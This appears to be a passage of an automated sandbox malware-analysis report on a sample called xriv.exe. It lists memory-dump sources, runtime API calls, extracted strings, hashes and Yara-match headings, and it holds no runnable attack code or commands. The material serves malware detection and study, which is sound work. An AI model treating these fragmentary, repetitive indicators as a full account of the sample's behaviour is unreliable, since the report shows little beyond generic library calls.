                                                                        • _free.LIBCMT ref: 0122178A
                                                                        • _free.LIBCMT ref: 012217C2
                                                                        • _free.LIBCMT ref: 012217C9
                                                                        • _free.LIBCMT ref: 012217E6
                                                                        • _free.LIBCMT ref: 012217FE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                        • String ID:
                                                                        • API String ID: 161543041-0
                                                                        • Opcode ID: 35ea17f8507beeed58743e65c5bb28e2ffab85caeea71ac9e56b25ba6be7781d
                                                                        • Instruction ID: 321844a25d18bdee5ba5ac957523f359892af832ab53ddd1e61d6d5611a9cc7e
                                                                        • Opcode Fuzzy Hash: 35ea17f8507beeed58743e65c5bb28e2ffab85caeea71ac9e56b25ba6be7781d
                                                                        • Instruction Fuzzy Hash: 1C318231A2031AEFEB25AE7CE844F6A77E9EF50650F10881AE65CD7190DF70E990C714
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 01218CC2
                                                                        • type_info::operator==.LIBVCRUNTIME ref: 01218CE9
                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 01218DF5
                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 01218ED0
                                                                        • _UnwindNestedFrames.LIBCMT ref: 01218F57
                                                                        • CallUnexpected.LIBVCRUNTIME ref: 01218F72
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                        • String ID: csm$csm$csm
                                                                        • API String ID: 2123188842-393685449
                                                                        • Opcode ID: d8420efc8bfad237c63643b2094aaaab5c195ab6ede81e28f71acf3beaeb5e1f
                                                                        • Instruction ID: b3cdaf75c63031fe3c190832768693d8c7f0162d2c42a21e714f03f498ee5854
                                                                        • Opcode Fuzzy Hash: d8420efc8bfad237c63643b2094aaaab5c195ab6ede81e28f71acf3beaeb5e1f
                                                                        • Instruction Fuzzy Hash: DFC16C7182020AEFDF29DFA8C8C09AEBBF5BF34314F44455AEA116B219D731DA51CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _free.LIBCMT ref: 0121DE42
                                                                          • Part of subcall function 0121D653: HeapFree.KERNEL32(00000000,00000000,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?), ref: 0121D669
                                                                          • Part of subcall function 0121D653: GetLastError.KERNEL32(?,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?,?), ref: 0121D67B
                                                                        • _free.LIBCMT ref: 0121DE4E
                                                                        • _free.LIBCMT ref: 0121DE59
                                                                        • _free.LIBCMT ref: 0121DE64
                                                                        • _free.LIBCMT ref: 0121DE6F
                                                                        • _free.LIBCMT ref: 0121DE7A
                                                                        • _free.LIBCMT ref: 0121DE85
                                                                        • _free.LIBCMT ref: 0121DE90
                                                                        • _free.LIBCMT ref: 0121DE9B
                                                                        • _free.LIBCMT ref: 0121DEA9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 6adb38837d5ed9bf551679270c779d620e7a894842bd903b17d322bc8b5cddde
                                                                        • Instruction ID: fb74a292b325c3c64b264397d26797198795e76baf3edda8bc7d92e5db314cea
                                                                        • Opcode Fuzzy Hash: 6adb38837d5ed9bf551679270c779d620e7a894842bd903b17d322bc8b5cddde
                                                                        • Instruction Fuzzy Hash: B521B77691414DEFCB01EFD4D884DEE7BF8BF28640F0085A6E6199B124DB71EA84CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0e120962bc5d3021f765e6163db77562ba838a3d3752cda1ba1342750051386f
                                                                        • Instruction ID: 4ff9c8c68af432f1aaa9aaf2945ff2ee53c5ac9577f8214dcb7c37f65d9998a8
                                                                        • Opcode Fuzzy Hash: 0e120962bc5d3021f765e6163db77562ba838a3d3752cda1ba1342750051386f
                                                                        • Instruction Fuzzy Hash: 35C10171E2425AAFDB25CF9CD884BFDBBB1AF5A310F048059E601A7381C7B49941CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$___from_strstr_to_strchr
                                                                        • String ID:
                                                                        • API String ID: 3409252457-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _ValidateLocalCookies.LIBCMT ref: 012185A7
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 012185AF
                                                                        • _ValidateLocalCookies.LIBCMT ref: 01218638
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 01218663
                                                                        • _ValidateLocalCookies.LIBCMT ref: 012186B8
                                                                        Strings
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 1170836740-1018135373
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: api-ms-$ext-ms-
                                                                        • API String ID: 0-537541572
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 01221405: _free.LIBCMT ref: 0122142A
                                                                        • _free.LIBCMT ref: 0122148B
                                                                          • Part of subcall function 0121D653: HeapFree.KERNEL32(00000000,00000000,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?), ref: 0121D669
                                                                          • Part of subcall function 0121D653: GetLastError.KERNEL32(?,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?,?), ref: 0121D67B
                                                                        • _free.LIBCMT ref: 01221496
                                                                        • _free.LIBCMT ref: 012214A1
                                                                        • _free.LIBCMT ref: 012214F5
                                                                        • _free.LIBCMT ref: 01221500
                                                                        • _free.LIBCMT ref: 0122150B
                                                                        • _free.LIBCMT ref: 01221516
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetConsoleCP.KERNEL32(?,01205140,00000000), ref: 01222B40
                                                                        • __fassign.LIBCMT ref: 01222D1F
                                                                        • __fassign.LIBCMT ref: 01222D3C
                                                                        • WriteFile.KERNEL32(?,01205140,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01222D84
                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 01222DC4
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 01222E70
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                        • String ID:
                                                                        • API String ID: 4031098158-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,01218887,01218476,01217AC4), ref: 0121889E
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 012188AC
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 012188C5
                                                                        • SetLastError.KERNEL32(00000000,01218887,01218476,01217AC4), ref: 01218917
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe, xrefs: 01220033
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                        • API String ID: 0-2143882575
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _wcsrchr
                                                                        • String ID: .bat$.cmd$.com$.exe
                                                                        • API String ID: 1752292252-4019086052
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: api-ms-
                                                                        • API String ID: 0-2084034818
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0121A9D8,0121E000,?,0121A9A0,0121AF26,?,0121E000), ref: 0121A9F8
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0121AA0B
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,0121A9D8,0121E000,?,0121A9A0,0121AF26,?,0121E000), ref: 0121AA2E
                                                                        Strings
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(01544058,01544058,?,7FFFFFFF,?,?,01226325,01544058,01544058,?,01544058,?,?,?,?,01544058), ref: 0122610C
                                                                        • __alloca_probe_16.LIBCMT ref: 012261C2
                                                                        • __alloca_probe_16.LIBCMT ref: 01226258
                                                                        • __freea.LIBCMT ref: 012262C3
                                                                        • __freea.LIBCMT ref: 012262CF
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __alloca_probe_16__freea$Info
                                                                        • String ID:
                                                                        • API String ID: 2330168043-0
                                                                        • Opcode ID: 677d0a137ce12094204f07a4b3a43cd2e003a3f3af66f9838fac60a4edf20cb7
                                                                        • Instruction ID: a8178812eda32b49b250562dc7e2034804f3df1e8aaa68399d5890d894df3200
                                                                        • Opcode Fuzzy Hash: 677d0a137ce12094204f07a4b3a43cd2e003a3f3af66f9838fac60a4edf20cb7
                                                                        • Instruction Fuzzy Hash: BA81B773D2022BBBEF219E988C41EEF7BB6EF5A250F190155EE05A7241D625DD40C7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • __alloca_probe_16.LIBCMT ref: 01224A18
                                                                        • __alloca_probe_16.LIBCMT ref: 01224ADE
                                                                        • __freea.LIBCMT ref: 01224B4A
                                                                          • Part of subcall function 0121DB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,01218272,?,?,?,?,?,012020C3,?,?), ref: 0121DB6E
                                                                        • __freea.LIBCMT ref: 01224B53
                                                                        • __freea.LIBCMT ref: 01224B76
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1423051803-0
                                                                        • Opcode ID: 7cdd767adfa282c9c702a4da5ea4a35e498c2b0ca1fcf6063c299934e656de64
                                                                        • Instruction ID: 23010cccef5330166a4754d70b0cc071d66d8c157a9ea08864ec47df2ef5c6f4
                                                                        • Opcode Fuzzy Hash: 7cdd767adfa282c9c702a4da5ea4a35e498c2b0ca1fcf6063c299934e656de64
                                                                        • Instruction Fuzzy Hash: 7951D572920267BBEB25AF68DC41FBF7AA9EF54750F150129FE14AB140F770DC1086A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0121B0E0), ref: 0121B1D0
                                                                        • GetFileInformationByHandle.KERNEL32(?,?), ref: 0121B22A
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0121B0E0,?,000000FF,00000000,00000000), ref: 0121B2B8
                                                                        • __dosmaperr.LIBCMT ref: 0121B2BF
                                                                        • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0121B2FC
                                                                          • Part of subcall function 0121B524: __dosmaperr.LIBCMT ref: 0121B559
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                        • String ID:
                                                                        • API String ID: 1206951868-0
                                                                        • Opcode ID: 5ac052120d28e3fcac13b752f3d54e2a8e75136d9aae845c197bd701b11fde06
                                                                        • Instruction ID: 4528235871620c4c42f31ce0ee45c60bb8e5f811216d2e48d0b042f9532b50e7
                                                                        • Opcode Fuzzy Hash: 5ac052120d28e3fcac13b752f3d54e2a8e75136d9aae845c197bd701b11fde06
                                                                        • Instruction Fuzzy Hash: EB414B75920709AFDB34DFB5D8459AFBBF9EFA8300B00852DE956D3614EB309904CB21
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _free.LIBCMT ref: 012213B4
                                                                          • Part of subcall function 0121D653: HeapFree.KERNEL32(00000000,00000000,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?), ref: 0121D669
                                                                          • Part of subcall function 0121D653: GetLastError.KERNEL32(?,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?,?), ref: 0121D67B
                                                                        • _free.LIBCMT ref: 012213C6
                                                                        • _free.LIBCMT ref: 012213D8
                                                                        • _free.LIBCMT ref: 012213EA
                                                                        • _free.LIBCMT ref: 012213FC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 6e9bbf03e33d47cce4eada891363bcafb64e2483be3e7dd4c9e140910a0d0597
                                                                        • Instruction ID: aaeb6a5d2a787217718eb2f8634619473a6ba486ed73ec11fc4acaa8d85b5280
                                                                        • Opcode Fuzzy Hash: 6e9bbf03e33d47cce4eada891363bcafb64e2483be3e7dd4c9e140910a0d0597
                                                                        • Instruction Fuzzy Hash: D4F04F72520216BBD624EF98F089C2A77DAEA207507644D06F71CDB944CA30F8D08A98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID: *?
                                                                        • API String ID: 269201875-2564092906
                                                                        • Opcode ID: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
                                                                        • Instruction ID: 2a910ce40a15b29e9a1477700290c0932de958d82462d6c7eaf9998c4adfc7fe
                                                                        • Opcode Fuzzy Hash: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
                                                                        • Instruction Fuzzy Hash: 8F617C76E1021A9FCB15CFA8C9805EEFBF5FF58310B24816AD925E7304E671AE45CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0120EE6A
                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0120EE79
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Xinvalid_argumentstd::_
                                                                        • String ID: invalid stoi argument$stoi argument out of range
                                                                        • API String ID: 909987262-1606216832
                                                                        • Opcode ID: a15227c2cf4615b51a7a3d10676f869161a39acb9f3c517b0a1dcd78ead88e88
                                                                        • Instruction ID: bd96bbb8ef7c1de27a0e917745db8357ad5e5997438fc3b5e0074579aa30aebf
                                                                        • Opcode Fuzzy Hash: a15227c2cf4615b51a7a3d10676f869161a39acb9f3c517b0a1dcd78ead88e88
                                                                        • Instruction Fuzzy Hash: 550192B1910319EFDB20EF69CC45BAEBBF8EB25710F508158E51467241DBB45A848BE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AdjustPointer
                                                                        • String ID:
                                                                        • API String ID: 1740715915-0
                                                                        • Opcode ID: d95cfa7b629d679294ad2dbd204bf43d3654c2c630985d2c9f9e9b6901f063ee
                                                                        • Instruction ID: dfccb53717e1ba10008604d113cdc67a4807e9290cb86416cb0a57b9f8340930
                                                                        • Opcode Fuzzy Hash: d95cfa7b629d679294ad2dbd204bf43d3654c2c630985d2c9f9e9b6901f063ee
                                                                        • Instruction Fuzzy Hash: 8B51C072A20207AFEB29CF18D8C1B7A7BE5FF64211F18052DDA0257699E731E980C791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(0000011C,?,FDD920DC,00000000), ref: 01204D89
                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01204DF0
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 01204DF7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProcVersion
                                                                        • String ID:
                                                                        • API String ID: 3310240892-0
                                                                        • Opcode ID: 98bae6878c975640662ee2353956ae7df055a7d0f8c148d17c472bff6f3eac2a
                                                                        • Instruction ID: 9a6c97cc8b6680b22bb9623e4703dedb055e16bf332cc9881be6081b6c63612a
                                                                        • Opcode Fuzzy Hash: 98bae6878c975640662ee2353956ae7df055a7d0f8c148d17c472bff6f3eac2a
                                                                        • Instruction Fuzzy Hash: A0516970D242599BDB25FF68DD487EDBBB4EB55310F5083A8E605A72C2EB344E808B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _free.LIBCMT ref: 0122509E
                                                                        • _free.LIBCMT ref: 012250C7
                                                                        • SetEndOfFile.KERNEL32(00000000,012225FD,00000000,0121D4F0,?,?,?,?,?,?,?,012225FD,0121D4F0,00000000), ref: 012250F9
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,012225FD,0121D4F0,00000000,?,?,?,?,00000000), ref: 01225115
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFileLast
                                                                        • String ID:
                                                                        • API String ID: 1547350101-0
                                                                        • Opcode ID: d61ea6f7662a3014d43bb0e323ae701f2e7a34ea37256f4c3c17dc17f4ac5139
                                                                        • Instruction ID: fec533a767352e150e3c31d760c1104082d7da7f287368dd2dc3a0cf1ccbe095
                                                                        • Opcode Fuzzy Hash: d61ea6f7662a3014d43bb0e323ae701f2e7a34ea37256f4c3c17dc17f4ac5139
                                                                        • Instruction Fuzzy Hash: BD41DA32920627BBDB11EFAC8C45AED37F5AF68360F288510F624A7295E678C64147A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 0121AE0F: _free.LIBCMT ref: 0121AE1D
                                                                          • Part of subcall function 01220971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,01224B40,?,00000000,00000000), ref: 01220A13
                                                                        • GetLastError.KERNEL32 ref: 0121FA02
                                                                        • __dosmaperr.LIBCMT ref: 0121FA09
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0121FA48
                                                                        • __dosmaperr.LIBCMT ref: 0121FA4F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                        • String ID:
                                                                        • API String ID: 167067550-0
                                                                        • Opcode ID: 107de486ed594d86986ee4e4ade619dabfbc9c9867d2845a297bd9b1c68c0332
                                                                        • Instruction ID: 7ccc03c01f007552b3c04f3add7cdbd1fec1e0ae8a8fcb4403ffcd36a7b6c405
                                                                        • Opcode Fuzzy Hash: 107de486ed594d86986ee4e4ade619dabfbc9c9867d2845a297bd9b1c68c0332
                                                                        • Instruction Fuzzy Hash: 0521C772620207BF9B21EF69898087B77EDEF242647104514E93997249E774ED048790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
